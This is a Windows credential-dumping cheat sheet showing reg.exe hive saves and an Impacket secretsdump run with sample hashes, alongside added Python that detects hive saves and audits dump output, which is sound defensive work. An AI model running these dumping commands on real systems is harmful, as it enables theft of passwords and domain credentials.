Dumping Windows Credentials
PE after compromising an AD Windows service

Dumping the NTLM Hash

Registry Hives

Get a copy of the SYSTEM, SECURITY and SAM hives

C:\> reg.exe save hklm\sam c:\temp\sam.save
C:\> reg.exe save hklm\security c:\temp\security.save
C:\> reg.exe save hklm\system c:\temp\system.save
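From the defender's side, as an added example that is not part of this page: the three reg.exe save commands above are visible to process-creation logging (Windows event 4688 when command-line auditing is enabled, or Sysmon event 1). The Python below runs over constructed sample command lines (not real telemetry), flags reg save/export of the SAM, SECURITY or SYSTEM hive, and raises the severity when one account collects all three, since that set is exactly what an offline secretsdump LOCAL run needs. The event fields and user names are assumptions made up for the example.

```python
import re
from typing import Dict, Iterable, List, Optional

# The three hives that, together, allow offline recovery of local hashes and LSA secrets.
SENSITIVE_HIVES = ("sam", "security", "system")

# Matches "reg save" / "reg export" (with or without .exe, path and quotes) whose target
# is one of the sensitive hives, written as HKLM\... or HKEY_LOCAL_MACHINE\...
HIVE_SAVE_RE = re.compile(
    r"""(?:^|[\\/\s"'])reg(?:\.exe)?["']?\s+(?:save|export)\s+["']?"""
    r"""(?:hklm|hkey_local_machine)\\(sam|security|system)\b""",
    re.IGNORECASE,
)


def hive_targeted(cmdline: str) -> Optional[str]:
    """Return 'sam', 'security' or 'system' if the command line saves that hive, else None."""
    m = HIVE_SAVE_RE.search(cmdline)
    return m.group(1).lower() if m else None


# Constructed sample process-creation records (id, user, command line); not real logs.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "user": "SECURUS\\svc-web", "cmdline": r"reg.exe save hklm\sam c:\temp\sam.save"},
    {"id": 2, "user": "SECURUS\\svc-web",
     "cmdline": r'"C:\Windows\System32\reg.exe" save "HKLM\SECURITY" c:\temp\security.save'},
    {"id": 3, "user": "SECURUS\\svc-web", "cmdline": r"reg.exe save hklm\system c:\temp\system.save"},
    {"id": 4, "user": "SECURUS\\alice",
     "cmdline": r"reg.exe query hklm\software\microsoft\windows\currentversion\run"},
    {"id": 5, "user": "SECURUS\\bob", "cmdline": r"regsvr32.exe /s c:\tools\thing.dll"},
    {"id": 6, "user": "SECURUS\\bob", "cmdline": r"reg.exe save hklm\software\contoso c:\temp\backup.hiv"},
]


def find_hive_dumps(events: Iterable[Dict]) -> List[Dict]:
    """One finding per user who saved any sensitive hive.

    The finding lists the hives seen and the event ids; severity is 'high' when
    SAM, SECURITY and SYSTEM all appear for the same user, 'medium' otherwise.
    A single hive save can be legitimate backup activity, so this is triage input,
    not a blocking rule.
    """
    per_user: Dict[str, Dict] = {}
    for ev in events:
        hive = hive_targeted(ev["cmdline"])
        if hive is None:
            continue
        entry = per_user.setdefault(ev["user"], {"hives": set(), "events": []})
        entry["hives"].add(hive)
        entry["events"].append(ev["id"])

    findings = []
    for user, entry in sorted(per_user.items()):
        complete = entry["hives"] >= set(SENSITIVE_HIVES)
        findings.append({
            "user": user,
            "hives": sorted(entry["hives"]),
            "events": entry["events"],
            "severity": "high" if complete else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_hive_dumps(SAMPLE_EVENTS):
        print(f)
```

The regex insists on whitespace after `reg`/`reg.exe`, so `regsvr32` and `regedit` never match, and the hive name is captured so that a copy of HKLM\SOFTWARE (common in legitimate backups) is ignored entirely.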

Password Hashes

Extract the password hashes and the LSA secrets from the saved hives in a single run with secretsdump (Impacket)
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.11-dev - Copyright 2002-2013 Core Security Technologies

[*] Target system bootKey: 0x602e8c2947d56a95bf9cfad9e0bbbace
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
Administrator:c4a850e0fee5af324a57fd2eeb8dbd24:SECURUS.CORP.COM:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
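Reading the output, as an added example that is not part of this page or of Impacket: the SAM lines above follow the pwdump format `user:rid:lmhash:nthash:::`, and an assessor (or the blue team reviewing an authorized dump) can turn them straight into configuration findings. The Python below parses those lines, skips the cached-credential and LSA-secret lines, and checks for the well-known empty-string hashes (`aad3b435...` for "no LM hash stored", `31d6cfe0...` for a blank password), a stored LM hash, a renamed RID 500 account and NT-hash reuse across accounts. The sample input is the page's own SAM section plus two constructed lines (`svc-backup`, `svc-web`) whose hashes are the well-known LM/NT hashes of the string `password`.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" : no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "" : the account has a blank password

# pwdump-style SAM line emitted by secretsdump: uid:rid:lmhash:nthash:::
SAM_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Sample dump: the page's SAM section plus two constructed accounts (svc-backup, svc-web).
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
renadm:500:aad3b435b51404eeaad3b435b51404ee:3e24dcead23468ce597d6883c576f657:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
support:1000:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
svc-backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
svc-web:1002:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
hdes:6ec74661650377df488415415bf10321:securus.corp.com:SECURUS:::
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f
"""


def parse_sam_lines(text: str) -> List[Dict]:
    """Return the SAM records of a secretsdump output; banner, cached-credential
    and LSA-secret lines do not match the pattern (their second field is not a
    numeric RID) and are skipped."""
    records = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            records.append({
                "user": m.group("user"),
                "rid": int(m.group("rid")),
                "lm": m.group("lm").lower(),
                "nt": m.group("nt").lower(),
            })
    return records


def audit_sam(records: List[Dict]) -> List[Tuple[str, str]]:
    """Return (user, finding) pairs for weak configuration visible in the hashes alone."""
    findings = []
    nt_counts = Counter(r["nt"] for r in records)
    for r in records:
        if r["nt"] == EMPTY_NT:
            # Normal for a disabled Guest account; a finding for anything else.
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (NoLMHash not enforced)"))
        if r["rid"] == 500 and r["user"].lower() != "administrator":
            findings.append((r["user"], "built-in Administrator (RID 500) renamed"))
        if r["nt"] != EMPTY_NT and nt_counts[r["nt"]] > 1:
            findings.append((r["user"], "NT hash shared with another account (password reuse)"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_sam(parse_sam_lines(SAMPLE_DUMP)):
        print(f"{user:12s} {finding}")
```

Matching the RID as a run of digits is what keeps the cached-credential lines out: their second field is a hash, not a number, so `hdes:6ec7...:securus.corp.com:SECURUS:::` is never mistaken for a SAM entry.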